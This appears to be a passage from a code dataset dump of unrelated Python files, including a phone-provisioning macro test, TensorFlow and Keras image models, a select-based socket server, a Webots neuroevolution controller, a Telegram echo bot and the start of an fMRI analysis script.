Edit the profile as below\n # (\"$SA\"==\"aaaa\")?https://test.com/$A.xml\n # 8.Edit the profile ad below\n # (\"$PWD\"==\"aaaa\")?tftp://test.com/$A.xml\n # 9. Edit the profile as below\n # (\"$SA\"==\"aaaa\")?tftp://test.com/$A.xml\n #\n # Expected Result:\n # After step 4-9 check:\n # 1. Go to the web->Debug Info,check the phone's message:\n # Condition not met.$PWD,$SA are not expanded\n\n def test03_GPPa_UserPwd_GPPsa(self):\n log.info(\"Start of test03_GPPa_UserPwd_GPPsa\")\n\n PWDstr = '(\"$PWD\"==\"aaaa\")?'\n SAstr = '(\"$SA\"==\"aaaa\")?'\n self.oPhone1.ui.set_param_value({\n 'GPP A': self.GPP_A_value,\n 'User Password': self.User_Password,\n 'GPP SA': self.GPP_SA_value\n })\n\n # step 4\n self.check_macro_next_index(PWDstr, 'http://')\n\n # step 5\n self.check_macro_next_index(SAstr, 'http://')\n\n # step 6\n self.check_macro_next_index(PWDstr, 'https://')\n\n # step 7\n self.check_macro_next_index(SAstr, 'https://')\n\n # step 8\n self.check_macro_next_index(PWDstr, 'tftp://')\n\n # step 9\n self.check_macro_next_index(SAstr, 'tftp://')\n\n log.info(\"End of test03_GPPa_UserPwd_GPPsa\")\n\n # ==================Group End Provision With Http & Tftp======\n\n\ndef main():\n tng.api.runner()\n\nif __name__ == '__main__':\n tng.run(main)\n","sub_path":"common/Provisioning/cmPROV_3pcc_provisioning_rule.py","file_name":"cmPROV_3pcc_provisioning_rule.py","file_ext":"py","file_size_in_byte":9931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"597617868","text":"import tensorflow as tf\nimport numpy as np\nimport os\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\nclass LeNet(tf.keras.Model):\n def __init__(self):\n super(LeNet, self).__init__()\n initializer = tf.initializers.GlorotUniform(seed=123)\n # Conv1\n self.wc1 = tf.Variable(initializer([3, 3, 3, 10]), trainable=True, name='wc1')\n \n # Conv2\n self.wc2 = tf.Variable(initializer([3, 3, 10, 20]), trainable=True, 
name='wc2')\n \n # Conv3\n self.wc3 = tf.Variable(initializer([3, 3, 20, 40]), trainable=True, name='wc3')\n \n # Flatten\n \n # Dense\n self.wd3 = tf.Variable(initializer([640, 280]), trainable=True)\n self.wd4 = tf.Variable(initializer([280, 80]), trainable=True) \n self.wd5 = tf.Variable(initializer([80, 10]), trainable=True)\n \n self.bc1 = tf.Variable(tf.zeros([10]), dtype=tf.float32, trainable=True)\n self.bc2 = tf.Variable(tf.zeros([20]), dtype=tf.float32, trainable=True)\n self.bc3 = tf.Variable(tf.zeros([40]), dtype=tf.float32, trainable=True)\n \n self.bd3 = tf.Variable(tf.zeros([280]), dtype=tf.float32, trainable=True)\n self.bd4 = tf.Variable(tf.zeros([80]), dtype=tf.float32, trainable=True) \n self.bd5 = tf.Variable(tf.zeros([10]), dtype=tf.float32, trainable=True) \n \n def call(self, x):\n # X = NHWC \n # Conv1 + maxpool 2\n x = tf.nn.conv2d(x, self.wc1, strides=[1, 1, 1, 1], padding=\"SAME\")\n x = tf.nn.bias_add(x, self.bc1)\n x = tf.nn.relu(x)\n x = tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding=\"SAME\")\n \n # Conv2 + maxpool 2\n x = tf.nn.conv2d(x, self.wc2, strides=[1, 1, 1, 1], padding=\"SAME\")\n x = tf.nn.bias_add(x, self.bc2)\n x = tf.nn.relu(x)\n x = tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding=\"SAME\")\n \n # Conv3 + maxpool 3\n x = tf.nn.conv2d(x, self.wc3, strides=[1, 1, 1, 1], padding=\"SAME\")\n x = tf.nn.bias_add(x, self.bc3)\n x = tf.nn.relu(x)\n x = tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding=\"SAME\")\n \n # Flattten out\n # N X Number of Nodes\n # Flatten()\n x = tf.reshape(x, (tf.shape(x)[0], -1))\n \n # Dense1\n x = tf.matmul(x, self.wd3)\n x = tf.nn.bias_add(x, self.bd3)\n x = tf.nn.relu(x)\n\n \n # Dense2\n x = tf.matmul(x, self.wd4)\n x = tf.nn.bias_add(x, self.bd4)\n x = tf.nn.relu(x)\n \n \n # Dense3\n x = tf.matmul(x, self.wd5)\n x = tf.nn.bias_add(x, self.bd5)\n# x = tf.nn.sigmoid(x)\n \n return x\n\ndef preprocess(image):\n image = 
tf.expand_dims(image, axis=0)\n image = tf.image.rgb_to_grayscale(image)\n image = tf.image.resize(image, (28, 28))\n image = tf.dtypes.cast(image, tf.float32)\n image = tf.image.per_image_standardization(image)\n return image\n\n\ndef predict_top_1(predictions):\n # model = tf.saved_model.load('../temp/models/')\n return tf.argmax(tf.nn.softmax(predictions), axis=1)\n\ndef predict_top_3(predictions):\n outputs = tf.math.top_k(tf.nn.softmax(predictions), k=3)\n\n top_k = []\n for confidences, indices in zip(outputs[0].numpy(), outputs[1].numpy()):\n single_sample = dict()\n for confidence, index in zip(confidences, indices):\n single_sample[index] = confidence\n top_k.append(single_sample)\n return top_k\n\n\nif __name__ == \"__main__\":\n model = LeNet()\n\n model_path = os.path.join(BASE_DIR, 'models', 'weights.h5')\n print(model_path)\n model.load_weights(model_path)\n","sub_path":"flask-deploy/architecture.py","file_name":"architecture.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"389502218","text":"import os\n\nfrom setuptools import setup, find_packages\nfrom opentb import VERSION, PACKAGE_NAME\n\n\n# Cannot create this list with pip.req.parse_requirements() because it requires\n# the pwd module, which is Unix only.\ndef _read_requirements(file_name):\n \"\"\"\n Returns list of required modules for 'install_requires' parameter. 
Assumes\n requirements file contains only module lines and comments.\n \"\"\"\n requirements = []\n with open(os.path.join(file_name)) as f:\n for line in f:\n if not line.startswith('#'):\n requirements.append(line.strip())\n return requirements\n\n\nINSTALL_REQUIREMENTS = _read_requirements('requirements.txt')\n\nSCRIPTS = ['opentb-cli', 'opentb-logger-cli']\n\n# read the contents of your README file\nthis_directory = os.path.abspath(os.path.dirname(__file__))\nwith open(os.path.join(this_directory, 'README.md')) as f:\n LONG_DESCRIPTION = f.read()\n\nsetup(\n name=PACKAGE_NAME,\n packages=find_packages(),\n python_requires='>3.8',\n include_package_data=True,\n install_requires=[INSTALL_REQUIREMENTS],\n scripts=SCRIPTS,\n version=VERSION,\n author='Francisco Molina',\n author_email='fjmolinas@gmail.com',\n description='',\n long_description_content_type='text/markdown',\n long_description=LONG_DESCRIPTION,\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.8',\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"10216255","text":"# Copyright 2020 Adap GmbH. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Partitioned versions of CIFAR-10/100 datasets.\"\"\"\n# pylint: disable=invalid-name\n\nfrom typing import Tuple\n\nimport tensorflow as tf\n\nfrom .dataset import (\n XY,\n PartitionedDataset,\n create_partitioned_dataset,\n log_distribution,\n)\n\n\ndef load_data(\n iid_fraction: float, num_partitions: int, cifar100: bool = False\n) -> Tuple[PartitionedDataset, XY]:\n \"\"\"Load partitioned version of CIFAR-10/100.\"\"\"\n cifar = tf.keras.datasets.cifar100 if cifar100 else tf.keras.datasets.cifar10\n (xy_train_partitions, xy_test_partitions), xy_test = create_partitioned_dataset(\n cifar.load_data(), iid_fraction, num_partitions\n )\n return (xy_train_partitions, xy_test_partitions), xy_test\n\n\nif __name__ == \"__main__\":\n # Load a partitioned dataset and show distribution of examples\n for _num_partitions in [10, 100]:\n for _fraction in [0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]:\n (xy_train_par, xy_test_par), _ = load_data(_fraction, _num_partitions)\n print(f\"\\nfraction: {_fraction}; num_partitions: {_num_partitions}\")\n log_distribution(xy_train_par)\n 
log_distribution(xy_test_par)\n","sub_path":"src/py/flwr_experimental/baseline/dataset/tf_cifar_partitioned.py","file_name":"tf_cifar_partitioned.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"162331830","text":"import select, socket, sys, queue\n\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.setblocking(0)\ns.bind((\"0.0.0.0\",5555))\ns.listen(5)\n\ni = [s]\no = []\n\nwhile i:\n r, w, e = select.select(i, o, [])\n print (\"Select\")\n print (r)\n for ss in r:\n if ss == s:\n cs, addr = s.accept()\n print (addr)\n i.append(cs) # pun cs in lista de socketuri\n print (i)\n else:\n print (ss.recv(20))\n\n for ss in e:\n ss.close()\n i.remove(ss)","sub_path":"Computer networks/Test prep/select_example.py","file_name":"select_example.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"48910663","text":"#!/usr/bin/env python3\n\nimport sys\nimport os\nimport argparse\nimport numpy as np\nimport tensorflow as tf\nimport json\nimport keras\n\nfrom keras.models import Sequential, Model, model_from_json\nfrom keras.layers import Dense, Flatten, Dropout, Input, concatenate, merge, Add, Dropout\nfrom keras.layers import Conv2D, Conv2DTranspose, Cropping2D, ZeroPadding2D, Activation\nfrom keras.layers import MaxPooling2D, UpSampling2D, Permute\nfrom keras import backend as K\nfrom keras.activations import softmax\nimport keras.backend.tensorflow_backend as tfb\nfrom keras.utils import plot_model\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.backend.tensorflow_backend import set_session\nfrom keras.optimizers import SGD,Adam\nfrom time import time\nfrom base_model import(BaseModel,sigmoid_cross_entropy_with_logits,\n image_accuracy,softmax_cross_entropy_with_logits)\n\n\n\ndef parse_args():\n \"\"\"\n function for argument parsing\n :return:\n \"\"\"\n 
parser = argparse.ArgumentParser()\n parser.add_argument(\"--cache\", \"-c\", help=\"Cache data wherever possible\", action='store_true')\n parser.add_argument(\"--classification\", \"-t\", help=\"Cache data wherever possible\",\n default=4, type=int)\n parser.add_argument(\"--dataset\", \"-d\", help=\"dataset small or big\",\n default=\"big\", choices=[\"small\", \"big\"], type=str)\n parser.add_argument(\"--reload\", \"-r\", help=\"reload data\", action='store_true')\n parser.add_argument(\"--activation\", \"-a\", help=\"activation function for conv layers\",\n default=\"relu\")\n parser.add_argument(\"--log_level\", \"-l\", help=\"Set loglevel for debugging and analysis\",\n default=\"INFO\")\n args = parser.parse_args()\n return args\n\n\nclass RetinaDevModel(BaseModel):\n def __init__(self, classification=4, dataset=\"big\", reload=False, activation='relu', cache=True):\n super(RetinaDevModel, self).__init__(classification, dataset, reload, activation, cache)\n\n def create_model(self):\n print(self.activation)\n input_shape =(3, 565, 565)\n\n data_input = Input(shape=input_shape, name=\"data_input\")\n conv1_1 = Conv2D(64, kernel_size=(3, 3), activation=self.activation, name=\"conv1_1\",\n padding=\"SAME\")(data_input)\n conv1_1 = Dropout(0.2, name=\"Drop1_1\")(conv1_1)\n conv1_2 = Conv2D(64, kernel_size=(3, 3), activation=self.activation, name=\"conv1_2\",\n padding=\"SAME\")(conv1_1)\n conv1_2 = Dropout(0.2, name=\"Drop1_2\")(conv1_2)\n max_pool1 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='max_pool1',\n padding=\"SAME\")(conv1_2)\n\n # Convolution Layer 2\n conv2_1 = Conv2D(128, kernel_size=(3, 3), activation=self.activation, name=\"conv2_1\",\n padding=\"SAME\")(max_pool1)\n conv2_1 = Dropout(0.2, name=\"Drop2_1\")(conv2_1)\n conv2_2 = Conv2D(128, kernel_size=(3, 3), activation=self.activation, name=\"conv2_2\",\n padding=\"SAME\")(conv2_1)\n conv2_2 = Dropout(0.2, name=\"Drop2_2\")(conv2_2)\n max_pool2 = MaxPooling2D(pool_size=(2, 2), 
strides=(2, 2), name='max_pool2',\n padding=\"SAME\")(conv2_2)\n\n # Convolution Layer3\n conv3_1 = Conv2D(256, kernel_size=(3, 3), activation=self.activation, name=\"conv3_1\",\n padding=\"SAME\")(max_pool2)\n conv3_1 = Dropout(0.2, name=\"Drop3_1\")(conv3_1)\n conv3_2 = Conv2D(256, kernel_size=(3, 3), activation=self.activation, name=\"conv3_2\",\n padding=\"SAME\")(conv3_1)\n conv3_2 = Dropout(0.2, name=\"Drop3_2\")(conv3_2)\n conv3_3 = Conv2D(256, kernel_size=(3, 3), activation=self.activation, name=\"conv3_3\",\n padding=\"SAME\")(conv3_2)\n conv3_3 = Dropout(0.2, name=\"Drop3_3\")(conv3_3)\n max_pool3 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='max_pool3',\n padding=\"SAME\")(conv3_3)\n\n # Convolution Layer4\n conv4_1 = Conv2D(512, kernel_size=(3, 3), activation=self.activation, name=\"conv4_1\",\n padding=\"SAME\")(max_pool3)\n conv4_1 = Dropout(0.2, name=\"Drop4_1\")(conv4_1)\n conv4_2 = Conv2D(512, kernel_size=(3, 3), activation=self.activation, name=\"conv4_2\",\n padding=\"SAME\")(conv4_1)\n conv4_2 = Dropout(0.2, name=\"Drop4_2\")(conv4_2)\n conv4_3 = Conv2D(512, kernel_size=(3, 3), activation=self.activation, name=\"conv4_3\",\n padding=\"SAME\")(conv4_2)\n conv4_3 = Dropout(0.2, name=\"Drop4_3\")(conv4_3)\n\n conv5_1 = Conv2D(64, kernel_size=(5, 5), activation=self.activation, name=\"conv5_1\",\n padding=\"SAME\")(max_pool1)\n conv5_1 = Dropout(0.2, name=\"Drop5_1\")(conv5_1)\n conv5_2 = Conv2D(64, kernel_size=(5, 5), activation=self.activation, name=\"conv5_2\",\n padding=\"SAME\")(conv5_1)\n conv5_2 = Dropout(0.2, name=\"Drop5_2\")(conv5_2)\n max_pool4 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='max_pool4',\n padding=\"SAME\")(conv5_2)\n\n # Convolution Layer 2\n conv6_1 = Conv2D(128, kernel_size=(5, 5), activation=self.activation, name=\"conv6_1\",\n padding=\"SAME\")(max_pool4)\n conv6_1 = Dropout(0.2, name=\"Drop6_1\")(conv6_1)\n conv6_2 = Conv2D(128, kernel_size=(5, 5), activation=self.activation, name=\"conv6_2\",\n 
padding=\"SAME\")(conv6_1)\n conv6_2 = Dropout(0.2, name=\"Drop6_2\")(conv6_2)\n max_pool5 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='max_pool5',\n padding=\"SAME\")(conv6_2)\n\n #\n conv1_2_16 = Conv2D(16, kernel_size=(3, 3), name=\"conv1_2_16\",\n padding=\"SAME\")(conv1_2)\n conv1_2_16 = Dropout(0.2, name=\"Drop1_2_16\")(conv1_2_16)\n conv2_2_16 = Conv2D(16, kernel_size=(3, 3), name=\"conv2_2_16\",\n padding=\"SAME\")(conv2_2)\n conv2_2_16 = Dropout(0.2, name=\"Drop2_2_16\")(conv2_2_16)\n conv3_3_16 = Conv2D(16, kernel_size=(3, 3), name=\"conv3_3_16\",\n padding=\"SAME\")(conv3_3)\n conv3_3_16 = Dropout(0.2, name=\"Drop3_3_16\")(conv3_3_16)\n conv4_3_16 = Conv2D(16, kernel_size=(3, 3), name=\"conv4_3_16\",\n padding=\"SAME\")(conv4_3)\n conv4_3_16 = Dropout(0.2, name=\"Drop4_3_16\")(conv4_3_16)\n\n conv5_2_16 = Conv2D(16, kernel_size=(5, 5), name=\"conv5_2_16\",\n padding=\"SAME\")(conv5_2)\n conv5_2_16 = Dropout(0.2, name=\"Drop5_2_16\")(conv5_2_16)\n conv6_2_16 = Conv2D(16, kernel_size=(5, 5), name=\"conv6_2_16\",\n padding=\"SAME\")(conv6_2)\n conv6_2_16 = Dropout(0.2, name=\"Drop6_2_16\")(conv6_2_16)\n\n # Deconvolution Layer1\n side_multi2_up = UpSampling2D(size=(2, 2), name=\"side_multi2_up\")(conv2_2_16)\n\n upside_multi2 = Cropping2D(cropping=((0, 1),(0, 1)), name=\"upside_multi2\")(side_multi2_up)\n\n # Decovolution Layer2\n side_multi3_up = UpSampling2D(size=(4, 4), name=\"side_multi3_up\")(conv3_3_16)\n upside_multi3 = Cropping2D(cropping=((1, 2),(1, 2)), name=\"upside_multi3\")(side_multi3_up)\n\n # Deconvolution Layer3\n side_multi4_up = UpSampling2D(size=(8, 8), name=\"side_multi4_up\")(conv4_3_16)\n upside_multi4 = Cropping2D(cropping=((1, 2),(1, 2)), name=\"upside_multi4\")(side_multi4_up)\n\n # Deconvolution Layer4\n side_multi5_up = UpSampling2D(size=(2, 2), name=\"side_multi5_up\")(conv5_2_16)\n\n upside_multi5 = Cropping2D(cropping=((0, 1),(0, 1)), name=\"upside_multi5\")(side_multi5_up)\n\n # Deconvolution Layer1\n side_multi6_up 
= UpSampling2D(size=(4, 4), name=\"side_multi6_up\")(conv6_2_16)\n\n upside_multi6 = Cropping2D(cropping=((1, 2),(1, 2)), name=\"upside_multi6\")(side_multi6_up)\n\n # Specialized Layer\n concat_upscore = concatenate([conv1_2_16, upside_multi2, upside_multi3, upside_multi4,\n upside_multi5, upside_multi6],\n name=\"concat-upscore\", axis=1)\n upscore_fuse = Conv2D(self._classification, kernel_size=(1, 1), name=\"upscore_fuse\")(concat_upscore)\n upscore_fuse = Dropout(0.2, name=\"Dropout_Classifier\")(upscore_fuse)\n # upscore_fuse = Activation('sigmoid')(upscore_fuse)\n\n self.model = Model(inputs=[data_input], outputs=[upscore_fuse])\n\n def set_weights(self):\n if self.cache and os.path.exists(\"cache/keras_crop_model_weights_4class_dev_reg_relu.h5\"):\n print(\"yes\")\n # self.model.set_weights(\"cache/keras_crop_model_weights_4class_dev2_reg_relu.h5\")\n # return\n with open(\"cache/dev2_model.json\") as f:\n dev_model = model_from_json(json.dumps(json.load(f)))\n dev_model.load_weights(\"cache/keras_crop_model_weights_4class_dev2_reg_relu.h5\")\n \n for dev_layer, layer in zip(dev_model.layers, self.model.layers):\n try:\n layer.set_weights(dev_layer.get_weights())\n except:\n print(layer.name)\n # self.model.save_weights(os.path.join('cache',\n # 'keras_crop_model_weights_4class_dev2_reg_{}.h5'.format(\n # self.activation)))\n\n def fit(self):\n print(self.train_images.shape)\n sgd = SGD(lr=1e-9, decay=1e-4, momentum=0.9, nesterov=True)\n weight_save_callback = keras.callbacks.ModelCheckpoint('/cache/checkpoint_weights.h5', monitor='val_loss',\n verbose=0, save_best_only=True, mode='auto')\n tb_callback = keras.callbacks.TensorBoard(log_dir='./Graph/{}/'.format(time()), histogram_freq=200,\n write_graph=True, write_images=False)\n\n self.model.compile(optimizer=sgd, loss=sigmoid_cross_entropy_with_logits,\n metrics=[ image_accuracy])\n\n self.model.fit(self.train_images, self.train_labels, batch_size=5, epochs=5000,\n callbacks=[tb_callback], 
validation_split=0.005, verbose=2)\n\n self.model.save_weights(os.path.join('cache', \n 'keras_crop_model_weights_4class_dev2_reg_{}.h5'.format(self.activation)))\n \n def predict(self, data):\n self.test_predict = self.model.predict(data, batch_size=10)\n print(self.test_predict[0])\n print(self.test_predict.shape)\n np.save('cache/test_predict2_class_4_dev2_{}.npy'.format(self.activation), self.test_predict)\n\n\nif __name__ == '__main__':\n args = parse_args()\n config = tf.ConfigProto ()\n config.gpu_options.visible_device_list = \"0\"\n set_session (tf.Session (config=config))\n rm = RetinaDevModel(classification=args.classification, dataset=args.dataset,\n reload=args.reload, activation=args.activation, cache=args.cache)\n rm.create_model()\n rm.set_weights()\n rm.get_data()\n print(rm.test_labels.shape)\n print(rm.train_images.shape)\n rm.run()\n # rm.predict(data=rm.test_images)\n K.clear_session()\n","sub_path":"python/dev2_model.py","file_name":"dev2_model.py","file_ext":"py","file_size_in_byte":11486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"246890226","text":"from functools import wraps\nimport logging\nimport os\n\n# A special helper to add logging\n\nLOG_FILE = 'hw2.log'\nAPP_NAME = 'hw2'\n\nos.remove(LOG_FILE)\n\nlogger = logging.getLogger(APP_NAME)\nlogger.setLevel(logging.DEBUG)\n# create file handler which logs even debug messages\nfh = logging.FileHandler(LOG_FILE)\nfh.setLevel(logging.DEBUG)\n# create console handler with a higher log level\nch = logging.StreamHandler()\nch.setLevel(logging.ERROR)\n# create formatter and add it to the handlers\nformatter = logging.Formatter('%(asctime)s - %(name)s - '\n '%(levelname)s - %(message)s')\nfh.setFormatter(formatter)\nch.setFormatter(formatter)\n# add the handlers to the logger\nlogger.addHandler(fh)\nlogger.addHandler(ch)\n\n\n# a decorator to add a debug logging of any function execution\ndef add_debug(func):\n @wraps(func)\n def 
wrapper(self, *argc, **kargc):\n logger.debug(f'{self.__class__.__name__} '\n f'method with name {func.__name__} at {func} invoked')\n res = func(self, *argc, **kargc)\n return res\n return wrapper\n","sub_path":"hw2/helpers/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"131369179","text":"\"\"\"epuck_collector controller.\"\"\"\n\n# You may need to import some classes of the controller module. Ex:\n# from controller import Robot, Motor, DistanceSensor\nfrom typing import Callable\nfrom controller import Camera, Motor, Robot, Receiver\nimport msgpack\nimport logging as log\n\nimport torch.nn as nn\nimport torch\nimport numpy as np\nimport random\n\n# create the Robot instance.\nrobot = Robot()\n\n# get the time step of the current world.\ntimestep = 128\n\ndef build_model():\n ffmlp = nn.Sequential(\n nn.Conv2d(3, 8, 3,stride=2),\n nn.ReLU(),\n nn.Conv2d(8, 16, 3,stride=2),\n nn.ReLU(),\n nn.Flatten(),\n nn.Linear(1728, 2),\n nn.Tanh(),\n )\n for param in ffmlp.parameters():\n param.requires_grad = False\n return ffmlp.cuda()\n\n\nclass indi:\n \"\"\"individium class\"\"\"\n\n def __init__(self, func: Callable):\n \"\"\"init individum with random x,y in [-2,2]\n\n Args:\n func (Callable): fitness funciton taking x,y params\n\n \"\"\"\n self.w = build_model()\n self.fitness = func\n self.last_fitness = 0\n\n def eval(self) -> float:\n \"\"\"evaluate fitness of this individuum\n\n Returns:\n [float]: fitness score (higher better)\n \"\"\"\n self.last_fitness = self.fitness(self.w)\n return self.last_fitness\n\n def mutate(self, sigma=0.1):\n \"\"\"mutate by drawing from ndist around current value with sigma\"\"\"\n for p in self.w.parameters():\n p += torch.randn_like(p)/100\n\ndef xover(a: indi, b: indi) -> indi:\n \"\"\"crossover between two individuals by randomly-weighted linear interpolation between their respective 
coefficients\n\n Args:\n a (indi): parent a\n b (indi): parent b\n\n Returns:\n indi: child c\n \"\"\"\n c = indi(fittness_eval)\n \n for p in zip(c.w.parameters(), a.w.parameters(), b.w.parameters()):\n rel = torch.rand_like(p[0].data).cuda()\n p[0].data.copy_(rel * p[1].data + (1 - rel) * p[2].data)\n return c\n\n\n\nrec: Receiver = robot.getDevice(\"receiver\")\nrec.enable(timestep)\ncamera: Camera = robot.getDevice(\"camera\")\ncamera.enable(timestep)\nlog.basicConfig(\n level=log.INFO, format=\"%(asctime)s %(filename)s %(levelname)s: %(message)s\"\n)\n\nmotorLeft:Motor = robot.getDevice('left wheel motor')\nmotorRight:Motor = robot.getDevice('right wheel motor')\nmotorLeft.setPosition(float('inf')) #this sets the motor to velocity control instead of position control\nmotorRight.setPosition(float('inf'))\nmotorLeft.setVelocity(0)\nmotorRight.setVelocity(0)\n\n\ndef fittness_eval(model, do_inf=False):\n points = 0\n balls_collected = 0\n startTime = int(robot.getTime()) \n while robot.step(timestep) != -1:\n # Read the sensors:\n # Enter here functions to read sensor data, like:\n # val = ds.getValue()\n if do_inf == False:\n theTime = robot.getTime() - startTime\n if theTime > 60*10 or (balls_collected/(1+theTime) < 1/60 and theTime > 60*3):\n reward = points + balls_collected/30.0\n print(f\"finished with {balls_collected} points after {int(theTime/60)} minutes\")\n return balls_collected\n imgBytes = camera.getImage()\n with torch.no_grad():\n image = (\n torch.from_numpy(\n np.frombuffer(imgBytes, np.uint8).reshape(\n (camera.getHeight(), camera.getWidth(), 4)\n )[:, :, :3]\n / 255.0\n )\n .float()\n .permute(2, 0, 1)\n .unsqueeze(0)\n .cuda()\n )\n motorSignal = model.forward(image)[0].cpu().numpy()\n\n\n \n motorRight.setVelocity(motorSignal[0]*motorRight.getMaxVelocity())\n motorLeft.setVelocity(motorSignal[1]*motorLeft.getMaxVelocity())\n # Process sensor data here.\n\n # Enter here functions to send actuator commands, like:\n # motor.setPosition(10.0)\n 
while rec.getQueueLength() > 0:\n msg_dat = rec.getData()\n rec.nextPacket()\n msg = msgpack.unpackb(msg_dat)\n points += int(msg[\"value\"])\n balls_collected += 1\n\n\n#%% run it\npopsize = 50\nmaxgen = 500\nuse_elitism = True\nallow_self_reproduction = True\npop = [indi(fittness_eval) for i in range(popsize*2)]\npop[0].w = torch.load(\"best.pkl\")\nfor gen in range(maxgen):\n pop.sort(key=lambda p0: p0.eval(), reverse=True)\n best = pop[0]\n print(f\"{gen}: fitness: {best.last_fitness} avg: {np.average([p.last_fitness for p in pop])}\")\n torch.save(best.w, \"best.pkl\")\n\n # cross over top 10 indis of old pop\n pop = pop[0:10]\n new_pop = []\n for a in pop:\n for b in pop:\n if allow_self_reproduction == False and a == b:\n continue\n new_ind = xover(a, b)\n new_ind.mutate()\n new_pop.append(new_ind)\n random.shuffle(new_pop)\n new_pop = new_pop[0:popsize]\n if use_elitism:\n pop = pop[0:1] + new_pop\n else:\n pop = new_pop","sub_path":"webots/controllers/epuck_collector/epuck_collector.py","file_name":"epuck_collector.py","file_ext":"py","file_size_in_byte":5094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"575189926","text":"import logging\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters\nlogging.basicConfig(filename='bot.log', level=logging.INFO)\n\nimport settings\n#настройка прокси\n# PROXY = {'proxy_url': 'socks5://t3.learn.python.ru:1080',\n# 'urllib3_proxy_kwargs':{'username': 'learn', 'password': 'python'}}\n\ndef greet_user(update, context):\n print('Вызван /start')\n update.message.reply_text('Привет пользователь! 
ты вызвал команду /start')\ndef talk_to_me(update, context):\n text = update.message.text\n print(text)\n update.message.reply_text(text)\ndef main():\n #Создаем бота и передаем ему ключ для авторизации на серверахтелеграмм\n mybot = Updater(settings.API_KEY, use_context=True)\n #, request_kwargs=PROXY)\n dp=mybot.dispatcher\n dp.add_handler(CommandHandler(\"start\", greet_user))\n dp.add_handler(MessageHandler(Filters.text, talk_to_me))\n logging.info('Бот стартовал')\n #Камандуем бота ходиить в телеграмм за сообщениями\n mybot.start_polling()\n #Запускаем бота, он будет работать пока мы его не остановим принудительно\n mybot.idle()\nif __name__== \"__main__\": \n main()","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"79903989","text":"import sys\nimport os\n\nroot = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nif root not in sys.path:\n sys.path.append(root)\n\n\nfrom utilities.settings import Subjects, Paths, Params\nfrom utilities.utils import get_output_parent_folder, get_path2output\nfrom models.english.LSTM.tokenizer import tokenize\n\nfrom itertools import combinations, product\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg')\n\nimport numpy as np\nimport nilearn\nfrom nilearn.image import load_img, mean_img, index_img, threshold_img, math_img\nfrom nilearn import datasets\nfrom nilearn.input_data import NiftiMapsMasker, NiftiMasker, NiftiLabelsMasker\nfrom nilearn.regions import RegionExtractor\nfrom utilities.utils import get_data, get_output_parent_folder, check_folder, transform_design_matrices, pca\n\nfrom joblib import Parallel, delayed\nimport yaml\nimport pandas as pd\nimport argparse\nfrom textwrap import wrap \n\nimport warnings\nwarnings.simplefilter(action='ignore')\n\nparams = Params()\npaths = Paths()\n\n\nif __name__ == '__main__':\n\n 
###########################################################################\n ####################### Loading Yaml and parameters #######################\n ###########################################################################\n\n parser = argparse.ArgumentParser(description=\"\"\"Objective:\\nAnalysis of the fMRI pipeline.\"\"\")\n parser.add_argument(\"--path_yaml\", default=None, help=\"Path to the yaml file with the models to compare.\")\n parser.add_argument(\"--analysis\", nargs='+', default=[], action='append', help='Analysis to perform.')\n parser.add_argument(\"--default_mask\", default=os.path.join(paths.path2data, 'fMRI', 'english', 'sub-057', 'func', 'fMRI_english_sub-057_run1.nii.nii'), help='fMRI data to construct a global mask.')\n\n args = parser.parse_args()\n\n with open(args.path_yaml, 'r') as stream:\n try:\n analysis_parameters = yaml.safe_load(stream)\n except yaml.YAMLError as exc:\n print(exc)\n\n subjects = analysis_parameters['subjects']\n source = analysis_parameters['source']\n language = analysis_parameters['language']\n\n i = 0\n\n #paths.path2derivatives = '/Users/alexpsq/Code/NeuroSpin/LePetitPrince/derivatives' # to delete\n #paths.path2data = '/Users/alexpsq/Code/NeuroSpin/LePetitPrince/data'\n\n\n ###########################################################################\n ############################## Scatter plots ##############################\n ###########################################################################\n \n if 'scatter_plots' in args.analysis[0]:\n # retrieve 